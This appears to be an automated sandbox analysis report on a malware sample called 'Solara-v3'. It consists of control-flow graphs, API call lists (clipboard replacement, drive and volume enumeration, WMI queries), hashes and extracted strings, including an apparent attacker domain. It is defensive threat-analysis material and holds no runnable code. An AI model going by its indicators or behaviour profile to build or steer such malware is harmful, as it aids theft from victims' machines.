                                                                                                                                                                                                                                              control_flow_graph 0 423675-42367f 1 4236d0 0->1 2 423a01-423a9a 0->2 3 423686-42368a 0->3 4 4239f7-423a00 0->4 5 4236c4-4236cf call 407fa0 0->5 6 423825-423836 0->6 7 4236d8-4236df 0->7 8 4239c9 0->8 9 4239b9-4239c1 0->9 10 4236be 0->10 11 42383d-42384a 0->11 1->7 13 423aa0-423ab8 2->13 19 423693 3->19 20 42368c-423691 3->20 5->1 6->2 6->8 6->9 6->11 16 423ad4-423ae8 6->16 17 423c1b 6->17 18 4239cf-4239db call 407fa0 6->18 14 4236e1-4236e6 7->14 15 4236e8 7->15 9->8 10->5 21 423853 11->21 22 42384c-423851 11->22 13->13 26 423aba-423ac4 call 421570 13->26 24 4236ef-42372a call 407f90 14->24 15->24 29 423af0-423b34 16->29 43 4239e4 18->43 27 423696-4236b7 call 407f90 RtlExpandEnvironmentStrings 19->27 20->27 28 42385a-4238f2 call 407f90 21->28 22->28 44 423730-42379d 24->44 40 423ac9-423acc 26->40 27->1 27->2 27->4 27->5 27->6 27->7 27->8 27->9 27->10 27->11 41 423900-42392d 28->41 29->29 31 423b36-423ba9 29->31 38 423bb0-423bf5 31->38 38->38 42 423bf7-423c12 call 421190 38->42 40->16 41->41 45 42392f-423938 41->45 42->17 53 4239ea-4239f4 call 407fa0 43->53 44->44 47 42379f-4237ab 44->47 50 423961-42396c 45->50 51 42393a-423942 45->51 48 4237d1-4237e2 47->48 49 4237ad-4237b3 47->49 58 423803 48->58 59 4237e4-4237ea 48->59 57 4237c0-4237cf 49->57 55 423991-4239b2 GetLogicalDrives call 440250 50->55 56 42396e-423971 50->56 54 423950-42395f 51->54 53->4 54->50 54->54 55->4 55->8 55->9 55->16 55->17 55->18 55->43 55->53 70 423d72-423d78 55->70 71 423c21-423c2d call 407fa0 55->71 63 423980-42398f 56->63 57->48 57->57 64 423806-423811 call 440250 58->64 61 4237f0-4237ff 59->61 61->61 67 423801 61->67 63->55 63->63 69 423816-42381e 64->69 67->64 69->2 69->6 69->8 69->9 69->11 69->16 69->18 73 423d81 70->73 74 423d7a-423d7f 70->74 71->70 76 423d84-423da4 call 407f90 RtlExpandEnvironmentStrings 73->76 74->76 79 423ff0-423ff2 76->79 80 424070-42407d 76->80 81 423ea6-423eb0 76->81 82 423ff7-424014 76->82 83 423db5-423def 76->83 84 423fc5-423fe9 call 43f450 76->84 85 423dab-423dad 76->85 86 42401b-42402d 76->86 87 423e99-423ea4 call 407fa0 76->87 88 4256bf-4256c8 79->88 91 424084-4240ae call 407f90 call 43f150 80->91 92 42407f 80->92 82->80 82->86 90 423df0-423e33 83->90 84->79 84->80 84->82 84->86 85->83 86->70 86->79 86->80 86->81 86->82 86->83 86->84 86->85 86->86 86->87 89 424060-424069 86->89 87->81 89->80 89->86 90->90 96 423e35-423e91 call 41f430 90->96 104 4240e3 91->104 105 4240c0-4240cf call 43f040 91->105 106 4240f0-42428f 91->106 107 4240b5 91->107 92->91 96->87 104->106 110 4240d4-4240dc 105->110 108 424290-4242ba 106->108 107->105 108->108 111 4242bc-424535 108->111 110->104 110->106 112 424540-424571 111->112 112->112 113 424573-42473b 112->113 114 424740-42476c 113->114 114->114 115 42476e-42493f 114->115 116 424940-424969 115->116 116->116 117 42496b-424b3f 116->117 118 424b40-424b70 117->118 118->118 119 424b72-424be0 118->119 119->88
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 004236A9
                                                                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00423996
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DrivesEnvironmentExpandLogicalStrings
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
                                                                                                                                                                                                                                              • API String ID: 1595903574-2236109924
                                                                                                                                                                                                                                              • Opcode ID: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                              • Instruction ID: 2fc2160d72e1542a336960e5481f9d0735e9c35b6a9b6e11306a6587d30006f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25A2B7B9D11229DBDB20DF18DC8529EBB71FF95304F1086E9C8596B350E7389A81CF86
                                                                                                                                                                                                                                              Function 0040CC75 Relevance: 30.2, Strings: 24, Instructions: 243COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 120 40cc75-40cc9a call 408630 123 40cca0-40cd04 120->123 123->123 124 40cd06-40cd6f 123->124 125 40cd70-40cd9c 124->125 125->125 126 40cd9e-40cdaf 125->126 127 40cdb1-40cdb8 126->127 128 40cdcb-40cdd7 126->128 129 40cdc0-40cdc9 127->129 130 40cdd9-40cdda 128->130 131 40cdeb-40cdf8 128->131 129->128 129->129 132 40cde0-40cde9 130->132 133 40cdfa-40ce01 131->133 134 40ce1b-40ce23 131->134 132->131 132->132 135 40ce10-40ce19 133->135 136 40ce25-40ce26 134->136 137 40ce3b-40cf53 134->137 135->134 135->135 138 40ce30-40ce39 136->138 139 40cf60-40cf80 137->139 138->137 138->138 139->139 140 40cf82-40cfaf 139->140 141 40cfb0-40cfd6 140->141 141->141 142 40cfd8-40d008 call 40b640 141->142 144 40d00d-40d037 142->144
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lev-tolstoi.com$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
                                                                                                                                                                                                                                              • API String ID: 0-3555453935
                                                                                                                                                                                                                                              • Opcode ID: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                              • Instruction ID: 8753c489787e8cef6e0b2d778e15f4088c0b1d051e6c25f020ec618a161c42f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C81F1B190D3D08AD7308F29D98979BBBE1EFC6300F554A6DC1C86B250EB7A0516CB96
                                                                                                                                                                                                                                              Function 00437CF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 574memorycomCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 145 437cf0-437d43 146 437d50-437d9d 145->146 146->146 147 437d9f-437dbd 146->147 149 437dca-437e18 CoCreateInstance 147->149 150 437dbf 147->150 151 4381fe-438226 call 43ea60 GetVolumeInformationW 149->151 152 437e1e-437e52 149->152 150->149 157 438230-438232 151->157 158 438228-43822c 151->158 153 437e60-437e90 152->153 153->153 155 437e92-437eb9 SysAllocString 153->155 161 437ebf-437ed9 CoSetProxyBlanket 155->161 162 4381ed-4381fa SysFreeString 155->162 160 438257-438262 157->160 158->157 163 438264-43826b 160->163 164 43826e-438282 160->164 165 4381e3-4381e9 161->165 166 437edf-437ef5 161->166 162->151 163->164 167 438290-4382c5 164->167 165->162 169 437f00-437f28 166->169 167->167 168 4382c7-438306 167->168 170 438310-438384 168->170 169->169 171 437f2a-437fa6 SysAllocString 169->171 170->170 172 438386-4383c1 call 41e1e0 170->172 173 437fb0-437fe8 171->173 177 4383d0-4383d8 172->177 173->173 175 437fea-438017 SysAllocString 173->175 180 4381cb-4381dc SysFreeString * 2 175->180 181 43801d-43803f 175->181 177->177 179 4383da-4383dc 177->179 182 4383e2-4383f2 call 408130 179->182 183 438240-438251 179->183 180->165 187 4381c1-4381c7 181->187 188 438045-438048 181->188 182->183 183->160 185 4383f7-4383fe 183->185 187->180 188->187 190 43804e-438053 188->190 190->187 191 438059-4380a4 VariantInit 190->191 192 4380b0-4380db 191->192 192->192 193 4380dd-4380ef 192->193 194 4380f3-4380f5 193->194 195 4381b0-4381bd VariantClear 194->195 196 4380fb-438101 194->196 195->187 196->195 197 438107-438115 196->197 198 438117-43811c 197->198 199 43814d 197->199 201 43812c-438130 198->201 200 43814f-43817e call 407f90 call 408c70 199->200 212 438180-43818a 200->212 213 43819f-4381ac call 407fa0 200->213 203 438132-43813b 201->203 204 438120 201->204 207 438142-438146 203->207 208 43813d-438140 203->208 206 438121-43812a 204->206 206->200 206->201 207->206 209 438148-43814b 207->209 208->206 209->206 212->213 214 43818c-438196 212->214 213->195 214->213 216 438198-43819b 214->216 216->213
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437E10
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32([d), ref: 00437E93
                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437ED1
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(!,.,), ref: 00437F2F
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(B6ABB756), ref: 00437FEF
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043805E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004381B1
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 004381D4
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004381DA
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004381EE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                              • String ID: ,,Y,$C$W;$[d$\
                                                                                                                                                                                                                                              • API String ID: 2485776651-2867424240
                                                                                                                                                                                                                                              • Opcode ID: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                              • Instruction ID: 3d09bc75159cb0bc0addfeff3c9f402bb7feac1769e375c6bd2c7d3d39127c8e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD02BA766083009FE710DF65C884B6BBBE5EFC9710F14882EF5959B3A0DB79E8018B56
                                                                                                                                                                                                                                              Function 05851000 Relevance: 19.6, APIs: 13, Instructions: 81clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000001), ref: 05851032
                                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0585103C
                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0585104C
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0585105D
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05851090
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 058510A0
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32 ref: 058510C1
                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 058510CB
                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D), ref: 058510D6
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 058510E3
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 058510ED
                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 058510F3
                                                                                                                                                                                                                                              • GetClipboardSequenceNumber.USER32 ref: 058510F9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3287856425.0000000005851000.00000020.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3287835274.0000000005850000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3287877993.0000000005852000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_5850000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1416286485-0
                                                                                                                                                                                                                                              • Opcode ID: 215ac403a93b66b026f2148bb99ec8e9f5328c2f4eba65ac35220f1ccde0d729
                                                                                                                                                                                                                                              • Instruction ID: ee2e451a42db64526e29257a1585c308ebfe48aa3adef009613bda1b9f8dddd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 215ac403a93b66b026f2148bb99ec8e9f5328c2f4eba65ac35220f1ccde0d729
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C02186396143509BDB202B75AC0EBAABBA8FF04765F040578FE87D6160EF25AC10C7A1
                                                                                                                                                                                                                                              Function 00410247 Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 700COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 240 410247-4102ff call 413cd0 * 2 call 401870 call 413cd0 * 2 call 401870 253 410301-41032c call 413820 240->253 254 410303-410306 240->254 261 410330-4103ba call 407f90 call 40a640 call 401870 253->261 262 41032e 253->262 256 410c7e 254->256 258 4115fb 256->258 260 4115fd-411685 call 401f30 258->260 269 40ea30-40eaa2 call 401f40 call 401e30 260->269 270 40ea29-411696 260->270 278 4103bc 261->278 279 4103be-410402 call 413820 261->279 262->261 283 40eaa4-40eb2c call 413cd0 * 4 call 401970 269->283 284 40eaa6 269->284 281 410438-410460 call 413820 278->281 289 410404 279->289 290 410406-410436 call 407f90 call 40a640 279->290 292 410462 281->292 293 410464-4104f4 call 407f90 call 40a640 RtlExpandEnvironmentStrings 281->293 283->258 320 40eb32 283->320 284->260 289->290 290->281 292->293 308 4104f6-4104f9 293->308 310 4104fb-41052a 308->310 311 41052c-410535 308->311 310->308 313 410552-41056e 311->313 314 410537-41054d call 407fa0 311->314 315 410570 313->315 316 410572-4105c8 call 407f90 RtlExpandEnvironmentStrings 313->316 314->256 315->316 324 4105f1-410658 call 407fa0 call 401870 316->324 325 4105ca-4105ec call 407fa0 * 2 316->325 320->258 337 4106a8-41070d call 401b80 324->337 338 41065a-41067b call 413820 324->338 342 410c7c 325->342 347 41070f-410712 337->347 345 41067d 338->345 346 41067f-4106a3 call 407f90 call 40a640 338->346 342->256 345->346 346->337 349 4107a5-4107c5 call 401a80 347->349 350 410718-4107a0 347->350 355 410b4b-410bc9 call 4089c0 call 4148a0 349->355 356 4107cb-410803 call 401f30 349->356 350->347 365 410bce-410bdd call 409570 355->365 361 410805 356->361 362 410807-41082d call 407f90 356->362 361->362 368 41085a-41085e 362->368 369 41082f-410836 362->369 371 410c1f-410c50 call 407fa0 * 2 365->371 372 410bdf-410bf2 365->372 374 410860-410862 368->374 373 410838-410844 call 413960 369->373 403 410c63-410c66 371->403 404 410c52-410c5e call 407fa0 371->404 375 410bf4 372->375 376 410c0d-410c18 call 407fa0 372->376 389 410846-410858 373->389 379 410864 374->379 380 410869-4108a2 call 401f40 374->380 382 410bf6-410c07 call 413b00 375->382 376->371 379->355 391 4108a4-4108a7 380->391 396 410c09 382->396 397 410c0b 382->397 389->368 394 4108e4-410922 call 401870 391->394 395 4108a9-4108e2 391->395 405 410929-41092c 394->405 395->391 396->382 397->376 407 410c70-410c77 call 408aa0 403->407 408 410c68-410c6b call 407fa0 403->408 404->403 409 410953-41098f call 401870 405->409 410 41092e-410951 405->410 407->342 408->407 416 410991-410994 409->416 410->405 417 410996-4109b9 416->417 418 4109bb-4109f8 call 401b80 416->418 417->416 421 4109fa-4109fd 418->421 422 410a03-410ad5 421->422 423 410ada-410b46 call 401b80 call 413980 421->423 422->421 423->374
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL ref: 004104C9
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL ref: 004105C0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: $$<.$X@$f@$i
                                                                                                                                                                                                                                              • API String ID: 237503144-92190101
                                                                                                                                                                                                                                              • Opcode ID: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                              • Instruction ID: 5d4d46c9a90ffb503717a27f7093fefa0dd82dfd25ea639eba7b9214d4ffac56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96528472A1C7508BC3649F39C4813EEB7E1AF85320F154A2EE8E9973D1D67899818B47
                                                                                                                                                                                                                                              Function 004116A0 Relevance: 12.9, APIs: 4, Strings: 2, Instructions: 2356COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: &8$`
                                                                                                                                                                                                                                              • API String ID: 0-842996520
                                                                                                                                                                                                                                              • Opcode ID: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                              • Instruction ID: e733c91b1712801f5584cc40fcd09b41f9830b0468eb1d5c922baaacae7725df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0213D3B6D042148BDB14DF78C9413DEBBF1AF45310F1586AED859AB391E7388D81CB8A
                                                                                                                                                                                                                                              Function 0043328C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1085 43328c-43336d call 413cd0 GetSystemMetrics * 2 1093 433374-433405 1085->1093
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                              • Instruction ID: d4d7d992982323047ebfbe64a21f998e07ffa76df3b32112bcb1f2418617eae3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB51A3B4E142089FCB40EFACD985A9EBBF0BF48310F10852AE498E7350D774A945CF96
                                                                                                                                                                                                                                              Function 00426520 Relevance: 4.1, Strings: 3, Instructions: 380COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1096 426520-42653b 1097 426540-426576 1096->1097 1097->1097 1098 426578-426584 1097->1098 1099 426586-42658f 1098->1099 1100 4265c4-4265ce 1098->1100 1101 426590-426597 1099->1101 1102 4265d0-42661b 1100->1102 1103 4265a0-4265a6 1101->1103 1104 426599-42659c 1101->1104 1102->1102 1105 42661d-426623 1102->1105 1103->1100 1107 4265a8-4265bc call 43cd20 1103->1107 1104->1101 1106 42659e 1104->1106 1108 426985-42698e 1105->1108 1109 426629-426645 call 43b180 1105->1109 1106->1100 1112 4265c1 1107->1112 1114 426650-426685 1109->1114 1112->1100 1114->1114 1115 426687-426693 1114->1115 1116 426695-42669f 1115->1116 1117 4266cf-4266d3 1115->1117 1118 4266a0-4266a7 1116->1118 1119 4266d9-4266e2 1117->1119 1120 42697c-426982 call 43b1a0 1117->1120 1122 4266b0-4266b6 1118->1122 1123 4266a9-4266ac 1118->1123 1124 4266f0-426705 1119->1124 1120->1108 1122->1117 1127 4266b8-4266c7 call 43cd20 1122->1127 1123->1118 1126 4266ae 1123->1126 1124->1124 1128 426707-426709 1124->1128 1126->1117 1133 4266cc 1127->1133 1130 426710-42671f call 407f90 1128->1130 1131 42670b 1128->1131 1135 426740-42674a 1130->1135 1131->1130 1133->1117 1136 426730-42673e 1135->1136 1137 42674c-42674f 1135->1137 1136->1135 1138 426763-42676b 1136->1138 1139 426750-42675f 1137->1139 1141 426973-426979 call 407fa0 1138->1141 1142 426771-42677c 1138->1142 1139->1139 1140 426761 1139->1140 1140->1136 1141->1120 1143 4267cb-4267e4 call 407f90 1142->1143 1144 42677e-426789 1142->1144 1152 426907-42692f 1143->1152 1153 4267ea-4267f0 1143->1153 1148 4267a6-4267aa 1144->1148 1150 426790-426798 1148->1150 1151 4267ac-4267b5 1148->1151 1154 42679b-4267a4 1150->1154 1155 4267c0-4267c4 1151->1155 1156 4267b7-4267ba 1151->1156 1159 426930-42694a 1152->1159 1153->1152 1158 4267f6-4267fc 1153->1158 1154->1143 1154->1148 1155->1154 1157 4267c6-4267c9 1155->1157 1156->1154 1157->1154 1160 426800-42680a 1158->1160 1159->1159 1161 42694c-42696f call 408dd0 call 407fa0 1159->1161 1162 426820-426825 1160->1162 1163 42680c-426812 1160->1163 1161->1141 1166 426850-42685e 1162->1166 1167 426827-42682a 1162->1167 1165 4268b0-4268b6 1163->1165 1173 4268b8-4268be 1165->1173 1170 426860-426863 1166->1170 1171 4268ca-4268d3 1166->1171 1167->1166 1169 42682c-426841 1167->1169 1169->1165 1170->1171 1177 426865-4268a8 1170->1177 1175 4268d5-4268d7 1171->1175 1176 4268d9-4268dc 1171->1176 1173->1152 1174 4268c0-4268c2 1173->1174 1174->1160 1179 4268c8 1174->1179 1175->1173 1180 426903-426905 1176->1180 1181 4268de-426901 1176->1181 1177->1165 1179->1152 1180->1165 1181->1165
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: X`X*$l'Y9${$[7
                                                                                                                                                                                                                                              • API String ID: 2994545307-1509796914
                                                                                                                                                                                                                                              • Opcode ID: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                              • Instruction ID: 627f6c153a1e7a7093b5324472515697c41291643dc6d7d1fda9c09fef2ffd72
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5B15A72B043609BEB14CF14E84176B73A2EFD5304F96843EE8459B391E639EC09C389
                                                                                                                                                                                                                                              Function 0040A8B0 Relevance: 4.1, Strings: 3, Instructions: 349COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
